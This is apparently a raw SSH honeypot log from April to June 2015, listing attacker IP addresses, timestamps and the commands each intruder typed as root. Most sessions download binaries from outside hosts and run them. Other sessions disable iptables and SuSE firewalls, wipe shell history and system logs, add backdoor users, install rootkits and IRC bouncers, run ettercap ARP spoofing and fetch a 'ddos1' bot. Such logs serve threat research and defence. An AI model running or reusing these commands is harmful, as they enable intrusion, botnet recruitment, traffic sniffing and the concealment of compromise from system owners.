http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe ls wget http://root-arhive.serveftp.com/scanner/gosh.jpg w wget -O wget -Y on wget -Y From 88.85.253.230 29-Apr-2015 05:48:53 ssh2 root wget -U wget f0rever.host.sk/mix/ssh.tgz.gz adduser add -a yum exit From 172.162.13.28 29-Apr-2015 10:41:57 ssh2 root w yum install passwd apt-get install passwd passwd From 107.182.141.25 29-Apr-2015 13:41:37 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08 chmod +x a08 ./a08 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08 chmod +x a08 ./a08 From 5.10.186.122 29-Apr-2015 15:29:43 ssh2 root unset HISTFILE w ls -la w ls -la ps ax w /sbi ifco ifcofnig /sbin/ifconfig w wget ls -la uname -a hostname ps x w ,uptime cat .bash_history ls -la cd /ro pwd cat .bash_history ps ax w cd /var/tmp pwd From 5.10.186.122 29-Apr-2015 15:35:01 ssh2 root unset HISTFILE w ls -la w ls -la ps ax w /sbi ifco ifcofnig /sbin/ifconfig w wget ls -la uname -a hostname ps x w uptime cat .bash_history ls -la pwd cat .bash_history ps ax w cd /var/tmp pwd From 89.204.139.186 29-Apr-2015 20:28:05 ssh2 root cd /tmp ls -la cd /root w ls -la id cd /var/tmp ls -la uname -a kill -9 -1 ls kill -9 -1 reboot cd /var/tmp reboot ls exit cd /dev/shm cat /proc/cpuinfo wget http://wmbro.webs.com/binfo.tgz From 172.162.76.243 1-May-2015 11:32:37 ssh2 root w tar wget ps -ax lfetch fetch From 172.162.0.135 1-May-2015 16:25:41 ssh2 root ftech fetch curl yum apt-get apt-get install tar tar w cat /proc/cpuinfo uname -a ps -aux cd /home ls reboot From 78.165.17.116 3-May-2015 02:37:09 ssh2 root history ls w cat /etc/redhat-release From 78.165.17.116 3-May-2015 07:30:13 ssh2 root w ls last From 107.189.144.54 3-May-2015 17:16:21 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip From 222.186.21.208 4-May-2015 07:55:33 ssh2 root Exec iptables -F iptables -F From 78.134.100.121 4-May-2015 12:48:37 ssh2 root w ls -a From 43.229.52.142 4-May-2015 17:41:41 ssh2 root mkdir .,. cd /var/tmp ls -a history ifconfig wget http://commentteam.ucoz.com/scan.tgz c history From 78.134.100.121 5-May-2015 18:07:01 ssh2 root w ls -a ifconfig cat /proc/cpuinfo mkdir .,. cd /var ls cd /var/tmp ls mkdir .,. wget http://commentteam.ucoz.com/scan.tgz history From 91.81.221.171 6-May-2015 18:32:21 ssh2 root uname uname -a cat /proc/cpuinfo From 91.81.221.205 7-May-2015 04:18:29 ssh2 root cat /proc/cpuinfo From 60.28.186.142 7-May-2015 14:04:37 ssh2 root host From 91.81.221.205 7-May-2015 18:57:41 ssh2 root host hostname ls cat ipcalc.pl nano ipcalc.pl adduser support From 91.81.221.205 7-May-2015 23:50:45 ssh2 root history -c rm rf history adduser uname useradd -r support user add -r support sudo adduser support user adduser uname a uname -a clear uname -a ls cd / ls cd / cd .. ls c From 43.229.52.149 8-May-2015 04:43:49 ssh2 root fdisk -l apt-get update aptget install update /bin cd /bin ls lsblk ls blk wget From 5.90.3.116 8-May-2015 09:36:53 ssh2 root ls pwd pwd adduser From 5.90.3.116 8-May-2015 14:29:57 ssh2 root ls cd / cd / pwd ls dir Cat network.pl cd root ls ls / Vi network.pl Ee network.pl cat From 91.81.221.205 8-May-2015 19:23:01 ssh2 root cat /proc/cpuinfo cat /root/network.pl cat network.pl cat /reglas.pl ls ifconfig From 43.229.52.143 9-May-2015 00:16:05 ssh2 root ls cd vmware ls lshw ls hw wget Perl -v curl php php -v perl python yum apt-get update Yum update apt-get install update cat /etc/debian apt-get install perl Perl -v apt-get install debian /bin/sh/perl -v cd cd / ls cat /etc/debian_version /bin/sh/ls From 91.81.221.205 9-May-2015 05:09:09 ssh2 root Chmod -r 777 / From 91.81.221.205 9-May-2015 10:02:13 ssh2 root apt-get install ftp From 91.81.221.205 9-May-2015 14:55:17 ssh2 root cat /etc/inetd.conf reboot restart reboot shutdown -r now passwd ps x halt -r /bin/ssh cd /bin/ssh ls nano test.pl edit cat cat test.pl sudo Kill -9 22244 sudo nano test.pl /ssh /sh sh /h start rebut usr cat .bash_history cat lan.doc apt-get install nano nano sudo aptget install update passwd bash From 5.90.3.116 9-May-2015 19:48:21 ssh2 root ps aux recovery reload /usr/bin/ cd /usr/bin/ sudo Su root ls Mail pwt cd / pwd cd etc pwd ls pwd perl sh reboot From 91.81.221.205 10-May-2015 00:41:25 ssh2 root passwd adimsh admin From 91.81.221.205 10-May-2015 05:34:29 ssh2 root netstat ftp open From 91.81.221.221 10-May-2015 15:20:37 ssh2 root tar tar zxvf unzip From 208.73.200.133 10-May-2015 17:56:29 ssh2 root Exec wget -c http://66.117.9.14:81/59&&chmod 777 59 wget -c http://66.117.9.14:81/59&&chmod 777 59 From 107.189.144.54 10-May-2015 20:13:41 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip From 184.164.71.105 11-May-2015 10:52:53 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip From 78.134.12.223 11-May-2015 20:39:01 ssh2 root w ifconfig cat /proc/cpuinfo history passwd passwrd /passwd mkdir .,. cd /var/tmp ls -a uname -a cd /var wget http://commentteam.ucoz.com/scan.tgz cd wget http://commentteam.ucoz.com/scan.tgz From 208.73.200.133 12-May-2015 00:53:35 ssh2 root Exec wget -c http://66.117.9.14:81/76&&chmod 777 76 wget -c http://66.117.9.14:81/76&&chmod 777 76 From 222.186.34.83 13-May-2015 01:57:25 ssh2 root Exec chmod 0755 /usr/bin/chattr chmod 0755 /usr/bin/chattr Exec chmod 0755 /usr/bin/chattr chmod 0755 /usr/bin/chattr From 208.73.200.133 13-May-2015 07:50:41 ssh2 root Exec wget -c http://66.117.9.14:81/49&&chmod 777 49 wget -c http://66.117.9.14:81/49&&chmod 777 49 From 212.71.202.45 13-May-2015 16:36:37 ssh2 root w uname -a ps x ls -a cat /proc/cpuinfo ls -a From 148.163.43.179 14-May-2015 02:22:45 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip From 104.223.11.112 14-May-2015 12:08:53 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a09.zip chmod +x a09.zip ./a09.zip From 212.71.202.45 14-May-2015 17:01:57 ssh2 root w uname -a cat /proc/cpuifno cat /proc/cpuinfo set +o history ls -a uname -a wget http://piratteam.hi2.ro/TOOLS/bnc/psy-autologin-autorun.jpg From 89.2.164.123 14-May-2015 21:55:01 ssh2 root cd /var/tmp ls -a cat /proc/cpuinfo perl From 148.163.43.179 15-May-2015 02:48:05 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a08.zip chmod +x a08.zip ./a08.zip From 157.7.152.200 15-May-2015 07:41:09 ssh2 root Exec wget -c http://148.163.29.85/i/a08.zip&&chmod 777 a08.zip wget -c http://148.163.29.85/i/a08.zip&&chmod 777 a08.zip From 184.164.71.105 15-May-2015 12:34:13 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a07.zip chmod +x a07.zip ./a07.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.20.127/i/a07.zip chmod +x a07.zip ./a07.zip From 104.149.245.120 15-May-2015 17:27:17 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a09 chmod +x a09 ./a09 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a09 chmod +x a09 ./a09 From 208.73.200.133 15-May-2015 21:44:53 ssh2 root Exec wget -c http://66.117.9.14:81/79&&chmod 777 79 wget -c http://66.117.9.14:81/79&&chmod 777 79 From 162.220.24.146 16-May-2015 17:52:37 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a07.zip chmod +x a07.zip ./a07.zip From 107.182.141.40 16-May-2015 22:45:41 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a08.zip chmod +x a08.zip ./a08.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a08.zip chmod +x a08.zip ./a08.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a08.zip chmod +x a08.zip ./a08.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a08.zip chmod +x a08.zip ./a08.zip From 104.149.245.120 17-May-2015 03:38:45 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a06.zip chmod +x a06.zip ./a06.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://38.68.17.37/i/a06.zip chmod +x a06.zip ./a06.zip From 188.138.17.15 17-May-2015 23:11:01 ssh2 root export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 pwd unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 pwd ls -a id w uptime ls -al From 78.134.89.155 18-May-2015 08:57:09 ssh2 root uname -a uptime ifconfig cat /proc/cpuinfo ls -a history passwd mkdir mkdir .,. wget http://gblmkd.web44.net/.com/bssh-new.tgz From 91.81.221.162 18-May-2015 18:43:17 ssh2 root cd ls From 78.134.89.155 19-May-2015 04:29:25 ssh2 root w whoami ls -all rm -rf .ssh history ifconfig cat /proc/cpuinfo ls -a ps x ifconfig mkdir .,. cd /var ls cd Mail ls nano lan.doc history -c cd /var/tmp ls mkdir ... From 195.154.151.28 19-May-2015 09:22:29 ssh2 root history ps x From 195.154.151.28 19-May-2015 14:15:33 ssh2 root wget http://rds.co/test/others/rk.jpg tar zxvf rk.jpg cd .sshd chmod +x * ./setup 3274434672 wget http://Debar.ucoz.com/bnc.tgz tar -zxvf bnc.tgz rm -rf bnc.tgz cd .bnc ./config x 4244 ./fuck ./run From 91.81.221.164 19-May-2015 19:08:37 ssh2 root w ls ps x unae uname -a w ifconfig ps x cat /proc/cpuinfo wget history wget ps x From 195.154.151.28 20-May-2015 00:01:41 ssh2 root mkdir .,. cd .,. ls nano network.pl yum install nano apt-get install nano wget database.do.am/scan/gosh.tgz cd ls ps x ls cat network.pl cat test.pl ps x hisory -c From 31.6.36.235 20-May-2015 04:54:45 ssh2 root ettercap apt-get apt-get install ettercap From 195.154.151.28 20-May-2015 09:47:49 ssh2 root ettercap -Tq -L dump -i eth0 -M ARP From 78.134.89.155 20-May-2015 14:40:53 ssh2 root w uname -a ifconfig cat/proc/cpuinfo From 78.134.89.155 20-May-2015 19:33:57 ssh2 root cat /proc/cpuinfo history ps x mkdir .,. ls -a rm -rf .ssh passwd password sudo su sudo su sudo -su apt-get install wget wget http://debar.ucoz.com/gosh.tgz.tar cd 24572 ls ls -all cd ls ls -a cd .user60.rdb ls From 78.134.14.121 21-May-2015 15:06:13 ssh2 root w ls -a ifconfig cat /proc/cpuinfo mkdir .,. wget http://debar.ucoz.com/gosh.tgz.tar history From 91.81.221.188 22-May-2015 00:52:21 ssh2 root w ps x history pwd id us ifconfig From 183.203.136.126 23-May-2015 01:17:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/132;chmod 777 132;./132; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.203.136.126:888/132 chmod 777 132 ./132 From 183.203.136.126 23-May-2015 06:10:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/124;chmod 777 124;./124; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.203.136.126:888/124 chmod 777 124 ./124 From 183.203.136.126 23-May-2015 11:03:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/126;chmod 777 126;./126; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.203.136.126:888/126 chmod 777 126 ./126 From 216.170.120.156 23-May-2015 15:27:29 ssh2 root Exec wget -c http://216.170.125.185/59&&chmod 777 59 wget -c http://216.170.125.185/59&&chmod 777 59 From 183.203.136.126 23-May-2015 15:56:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/131;chmod 777 131;./131; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.203.136.126:888/131 chmod 777 131 ./131 From 183.203.136.126 23-May-2015 20:49:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/130;chmod 777 130;./130; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.203.136.126:888/130 chmod 777 130 ./130 From 183.203.136.126 24-May-2015 01:43:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.203.136.126:888/8998;chmod 777 8998;./8998; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.203.136.126:888/8998 chmod 777 8998 ./8998 From 31.6.35.28 24-May-2015 06:36:05 ssh2 root ettercap apt-get install ettercap apt-get install ettercap-text-only ettercap -Tq -L dump -i eth0 -M ARP apt-get upgrade From 107.160.59.29 24-May-2015 11:29:09 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://198.15.234.66/i/a07.zip chmod +x a07.zip ./a07.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://198.15.234.66/i/a07.zip chmod +x a07.zip ./a07.zip From 107.150.45.147 24-May-2015 22:24:35 ssh2 root Exec ls ./ ls ./ From 43.255.189.11 25-May-2015 07:01:25 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://198.15.234.66/i/a06.zip chmod +x a06.zip ./a06.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://198.15.234.66/i/a06.zip chmod +x a06.zip ./a06.zip From 134.213.156.13 26-May-2015 12:19:49 ssh2 root Exec hostname hostname From 198.15.131.169 26-May-2015 17:12:53 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.143.5.13/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.143.5.13/i/a09.zip chmod +x a09.zip ./a09.zip Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.143.5.13/i/a09.zip chmod +x a09.zip ./a09.zip #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.143.5.13/i/a09.zip chmod +x a09.zip ./a09.zip From 88.147.37.170 27-May-2015 22:31:17 ssh2 root w ls -all rm -rf .ssh history cat /proc/cpuinfo ifconfig mkdir .,. cd /var/tmp ls mkdri .,. mkdir .,. uname -a cd tmp ls cd cd var ls wget http://commentteam.ucoz.com/bssh-new.tgz history -c From 108.84.73.123 28-May-2015 13:10:29 ssh2 root ls cd .. ls cd .. ls cd ns ls cd nsmail ls vim test.pl vi test.pl nano test.pl gtk hrlp help /? ? tasklist ps -A cd /etc ls From 92.75.38.199 29-May-2015 13:35:49 ssh2 root w uname -a ls -a cd /dev/shm ls -a wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe From 43.229.53.49 29-May-2015 18:28:53 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 From 43.229.53.67 29-May-2015 23:21:57 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 From 43.229.53.66 30-May-2015 04:15:01 ssh2 root Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 Exec #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://23.234.19.202/i/a08 chmod +x a08 ./a08 From 172.158.5.24 30-May-2015 14:01:09 ssh2 root tar wget ks ls uname -a cat /proc/cpuinfo From 65.111.181.5 30-May-2015 18:54:13 ssh2 root w uname -a ps x cat /proc/cpuinfo cat /etc/issue cat /proc/cpuinfo ps x perl apt-get apt-get install perl cd /tmp mkdir .". ." cd .". ." mkdir ." " cd ." " wget f0rever.host.sk/blk/byu perl byu wget tar wget ftp://temp:muie1332@220.128.70.85/php.txt perl php.txt exit From 178.7.114.244 31-May-2015 14:26:29 ssh2 root w uname -a cat /proc/cpuinfo cd /home ls -a wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe From 120.27.54.108 31-May-2015 19:19:33 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://120.27.54.108:2554/ddos1;chmod 777 ddos1;./ddos1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://120.27.54.108:2554/ddos1 chmod 777 ddos1 ./ddos1 From 178.7.114.244 1-Jun-2015 00:12:37 ssh2 root w uname -a cat /proc/cpuinfo ls -a cd /dev/shm ls -a From 178.7.114.244 1-Jun-2015 05:05:41 ssh2 root wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe history -c -d offset From 216.170.120.156 1-Jun-2015 16:07:11 ssh2 root Exec wget -c http://216.170.125.185/79&&chmod 777 79 wget -c http://216.170.125.185/79&&chmod 777 79 From 104.207.134.245 2-Jun-2015 10:10:29 ssh2 root cat .bash_history cd -- pwd cd /root ls -a cat .bash_history locate .bash_history find / |grep .bash_history From 176.10.99.208 2-Jun-2015 10:24:05 ssh2 root w export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0 pwd gcc ls -a id uname -a hoami cat /etc/passwd ls -a whoami wget pwd pwd df -h cd /run/shm ls -a /media ls -a /video who whoami apt-get install gcc make automake pwd ls -a whoami pwd ls -a nano test.pl ls -al wget From 104.207.134.245 2-Jun-2015 15:17:09 ssh2 root cat .bash_history pwd cd /root ls -a cat .bash_history locate .bash_history find / |grep .bash_history From 109.74.10.91 3-Jun-2015 01:03:17 ssh2 root unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE w ifconfig unset rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null export last ps -ef w ps -e df -h ifconfig exit From 31.6.45.212 3-Jun-2015 05:56:21 ssh2 root mail apt-get apt-get install mailutils apt-get install mailutils install mailutils mailutilsastlog install mailutils mail From 216.170.125.156 3-Jun-2015 09:23:19 ssh2 root Exec wget -c http://216.170.125.185/76&&chmod 777 76 wget -c http://216.170.125.185/76&&chmod 777 76 From 216.170.120.156 3-Jun-2015 19:42:21 ssh2 root Exec wget -c http://216.170.125.185/49&&chmod 777 49 wget -c http://216.170.125.185/49&&chmod 777 49 Exec wget -c http://216.170.125.185/49&&chmod 777 49 wget -c http://216.170.125.185/49&&chmod 777 49 From 222.186.21.201 3-Jun-2015 20:35:33 ssh2 root Exec chmod 0755 /usr/bin/chattr chmod 0755 /usr/bin/chattr From 103.40.102.76 5-Jun-2015 01:53:57 ssh2 root wget http://192.184.39.67:1818/facai2015 chmod +x facai2015 ./facai2015 chattr +i ps -ef From 78.191.194.64 5-Jun-2015 06:47:01 ssh2 root history ls From 89.136.65.218 5-Jun-2015 11:40:05 ssh2 